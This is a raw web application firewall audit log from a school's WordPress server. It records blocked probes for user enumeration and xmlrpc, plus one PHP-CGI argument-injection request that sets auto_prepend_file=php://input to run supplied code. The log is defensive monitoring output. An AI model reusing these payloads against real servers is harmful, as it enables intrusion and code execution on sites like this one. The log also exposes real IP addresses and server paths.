"/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746677172208592 4775 (- - -) Stopwatch2: 1746677172208592 4775; combined=3740, p1=452, p2=3084, p3=26, p4=29, p5=88, sr=72, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e626eb36-Z-- --40321d38-A-- [08/May/2025:11:08:58 +0700] aBwuWqcs1DvJ_HgMHE_ySQAAABg 103.236.140.4 43944 103.236.140.4 8181 --40321d38-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.187 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.187 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --40321d38-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40321d38-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746677338889797 3006 (- - -) Stopwatch2: 1746677338889797 3006; combined=1297, p1=445, p2=823, p3=0, p4=0, p5=29, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40321d38-Z-- --8d1ea660-A-- [08/May/2025:11:09:02 +0700] aBwuXqcs1DvJ_HgMHE_yTAAAAAk 103.236.140.4 43952 103.236.140.4 8181 --8d1ea660-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.187 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.187 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8d1ea660-C-- demo.sayHello --8d1ea660-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8d1ea660-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746677342375367 6273 (- - -) Stopwatch2: 1746677342375367 6273; combined=4458, p1=608, p2=3536, p3=43, p4=43, p5=136, sr=77, sw=92, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8d1ea660-Z-- --e4129517-A-- [08/May/2025:11:10:28 +0700] aBwutKcs1DvJ_HgMHE_yTwAAAAs 103.236.140.4 43960 103.236.140.4 8181 --e4129517-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.75.189 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.75.189 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e4129517-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e4129517-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746677428068075 2803 (- - -) Stopwatch2: 1746677428068075 2803; combined=1261, p1=461, p2=771, p3=0, p4=0, p5=29, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e4129517-Z-- --465f440b-A-- [08/May/2025:11:10:31 +0700] aBwut6cs1DvJ_HgMHE_yUQAAAAg 103.236.140.4 43964 103.236.140.4 8181 --465f440b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.75.189 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.75.189 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --465f440b-C-- demo.sayHello --465f440b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --465f440b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746677431883338 5211 (- - -) Stopwatch2: 1746677431883338 5211; combined=3880, p1=434, p2=3232, p3=23, p4=26, p5=96, sr=66, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --465f440b-Z-- --9d63423c-A-- [08/May/2025:11:12:42 +0700] aBwvOo4K347NtBcwXKwGXAAAAJU 103.236.140.4 43974 103.236.140.4 8181 --9d63423c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 111.90.182.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 111.90.182.153 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9d63423c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d63423c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746677562479108 2873 (- - -) Stopwatch2: 1746677562479108 2873; combined=1283, p1=413, p2=842, p3=0, p4=0, p5=28, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d63423c-Z-- --8973ab43-A-- [08/May/2025:11:14:51 +0700] aBwvu44K347NtBcwXKwGXgAAAIo 103.236.140.4 43988 103.236.140.4 8181 --8973ab43-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.85.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.85.192 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8973ab43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8973ab43-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746677691119072 2851 (- - -) Stopwatch2: 1746677691119072 2851; combined=1258, p1=455, p2=774, p3=0, p4=0, p5=29, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8973ab43-Z-- --961be337-A-- [08/May/2025:11:14:55 +0700] aBwvv44K347NtBcwXKwGXwAAAJY 103.236.140.4 43992 103.236.140.4 8181 --961be337-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.85.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.85.192 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --961be337-C-- demo.sayHello --961be337-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --961be337-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746677695361749 5818 (- - -) Stopwatch2: 1746677695361749 5818; combined=4273, p1=571, p2=3441, p3=36, p4=38, p5=108, sr=82, sw=79, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --961be337-Z-- --8534bb37-A-- [08/May/2025:11:16:39 +0700] aBwwJ44K347NtBcwXKwGYwAAAIU 103.236.140.4 44004 103.236.140.4 8181 --8534bb37-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.43 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.43 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8534bb37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8534bb37-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746677799468766 3472 (- - -) Stopwatch2: 1746677799468766 3472; combined=1487, p1=507, p2=947, p3=0, p4=0, p5=32, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8534bb37-Z-- --5549490d-A-- [08/May/2025:11:16:45 +0700] aBwwLY4K347NtBcwXKwGZQAAAIE 103.236.140.4 44008 103.236.140.4 8181 --5549490d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.43 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.43 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5549490d-C-- demo.sayHello --5549490d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5549490d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746677805237933 5470 (- - -) Stopwatch2: 1746677805237933 5470; combined=4114, p1=506, p2=3386, p3=29, p4=32, p5=95, sr=73, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5549490d-Z-- --4fc55e02-A-- [08/May/2025:11:32:09 +0700] aBwzyacs1DvJ_HgMHE_yXQAAAAw 103.236.140.4 44136 103.236.140.4 8181 --4fc55e02-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 208.96.130.82 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 208.96.130.82 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4fc55e02-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4fc55e02-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746678729908172 3375 (- - -) Stopwatch2: 1746678729908172 3375; combined=1437, p1=489, p2=915, p3=0, p4=0, p5=33, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4fc55e02-Z-- --21cab73d-A-- [08/May/2025:11:43:15 +0700] aBw2Y44K347NtBcwXKwGpAAAAJE 103.236.140.4 44276 103.236.140.4 8181 --21cab73d-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --21cab73d-C-- --21cab73d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --21cab73d-E-- --21cab73d-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746679395263245 4217 (- - -) Stopwatch2: 1746679395263245 4217; combined=2230, p1=513, p2=1678, p3=0, p4=0, p5=39, sr=80, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --21cab73d-Z-- --13258848-A-- [08/May/2025:11:50:27 +0700] aBw4E44K347NtBcwXKwGrwAAAIw 103.236.140.4 44324 103.236.140.4 8181 --13258848-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.175.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.175.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --13258848-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --13258848-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746679827972622 2886 (- - -) Stopwatch2: 1746679827972622 2886; combined=1285, p1=429, p2=826, p3=0, p4=0, p5=29, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13258848-Z-- --a9bf9c5f-A-- [08/May/2025:11:50:36 +0700] aBw4HCs5rYyn3jlLjjK_hAAAAM8 103.236.140.4 44328 103.236.140.4 8181 --a9bf9c5f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.175.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.175.194 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a9bf9c5f-C-- demo.sayHello --a9bf9c5f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a9bf9c5f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746679836277285 5187 (- - -) Stopwatch2: 1746679836277285 5187; combined=3978, p1=465, p2=3292, p3=31, p4=36, p5=91, sr=68, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a9bf9c5f-Z-- --933ffd15-A-- [08/May/2025:12:29:16 +0700] aBxBLCs5rYyn3jlLjjK_jQAAAMU 103.236.140.4 44606 103.236.140.4 8181 --933ffd15-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.28 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --933ffd15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --933ffd15-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746682156333765 3275 (- - -) Stopwatch2: 1746682156333765 3275; combined=1449, p1=504, p2=912, p3=0, p4=0, p5=33, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --933ffd15-Z-- --68099354-A-- [08/May/2025:12:29:22 +0700] aBxBMsP9GxxPAbCroFbNSAAAAEo 103.236.140.4 44610 103.236.140.4 8181 --68099354-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.28 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --68099354-C-- demo.sayHello --68099354-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --68099354-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746682162806645 5558 (- - -) Stopwatch2: 1746682162806645 5558; combined=4105, p1=486, p2=3347, p3=28, p4=32, p5=125, sr=71, sw=87, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68099354-Z-- --d3e4ae70-A-- [08/May/2025:12:30:36 +0700] aBxBfMP9GxxPAbCroFbNSQAAAEE 103.236.140.4 44614 103.236.140.4 8181 --d3e4ae70-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.72.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.72.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d3e4ae70-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3e4ae70-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746682236867398 2919 (- - -) Stopwatch2: 1746682236867398 2919; combined=1299, p1=433, p2=835, p3=0, p4=0, p5=31, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
